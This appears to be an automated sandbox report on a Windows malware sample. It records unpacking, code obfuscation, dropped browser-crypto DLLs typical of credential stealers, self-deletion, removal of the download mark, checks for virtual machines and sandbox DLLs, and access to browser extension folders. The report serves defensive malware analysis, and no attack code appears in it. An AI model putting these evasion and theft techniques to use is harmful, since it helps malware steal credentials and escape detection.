Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source:	Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source:	Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Unpacked PE file: 0.2.xvJv1BpknZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\etrtabd	Unpacked PE file: 6.2.etrtabd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Unpacked PE file: 7.2.5876.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Unpacked PE file: 7.2.5876.exe.400000.0.unpack

PE file contains sections with non-standard names

Source: sqls[1].dll.12.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.12.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.12.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.12.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.12.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.12.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.12.dr	Static PE information: section name: .didat
Source: nss3.dll.12.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.12.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.12.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.12.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00402CD7 push cs; retf	0_2_00402CD8
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h	0_2_00401EB6
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_004033B6 push eax; ret	0_2_00403419
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02111F0E push 0000000Eh; retf 0038h	0_2_02111F1D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02112D3E push cs; retf	0_2_02112D3F
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02153622 push edx; retf	0_2_02153626
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0215795A push 0000000Eh; retf 0038h	0_2_02157969
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02158B40 push eax; ret	0_2_02158B41
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0215D996 push 0000002Ah; iretd	0_2_0215D9E0
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021574B7 push ss; iretw	0_2_021574C9
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021584CC push cs; retf	0_2_021584CD
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_021578EA push cs; retf 0038h	0_2_02157969
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00402CD7 push cs; retf	6_2_00402CD8
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401EA7 push 0000000Eh; retf 0038h	6_2_00401EB6
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_004033B6 push eax; ret	6_2_00403419
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C1F0E push 0000000Eh; retf 0038h	6_2_020C1F1D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C2D3E push cs; retf	6_2_020C2D3F
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02203927 push edx; retf	6_2_02203BC6
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_0220DF36 push 0000002Ah; iretd	6_2_0220DF80
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02208A6C push cs; retf	6_2_02208A6D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207A57 push ss; iretw	6_2_02207A69
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207E8A push cs; retf 0038h	6_2_02207F09
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_022090E0 push eax; ret	6_2_022090E1
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02207EFA push 0000000Eh; retf 0038h	6_2_02207F09
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0214030D push ecx; ret	7_2_02140315
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427B010 push edx; ret	11_2_0427B21F
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427A910 push edx; ret	11_2_0427A91B

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	File created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5876.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\etrtabd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EE6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\etrtabd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xvjv1bpknz.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_007A2D2F rdtsc

7_2_007A2D2F

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 481	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1153	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 774	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 351	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 377	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3695	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 875	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 7556	Thread sleep count: 481 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep count: 1153 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep time: -115300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7560	Thread sleep count: 774 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7560	Thread sleep time: -77400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep count: 351 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep time: -35100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7896	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7904	Thread sleep count: 377 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7904	Thread sleep time: -37700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep count: 3695 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep time: -369500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe TID: 8020	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4508	Thread sleep count: 54 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0CEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

12_2_6D0CEBF0

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

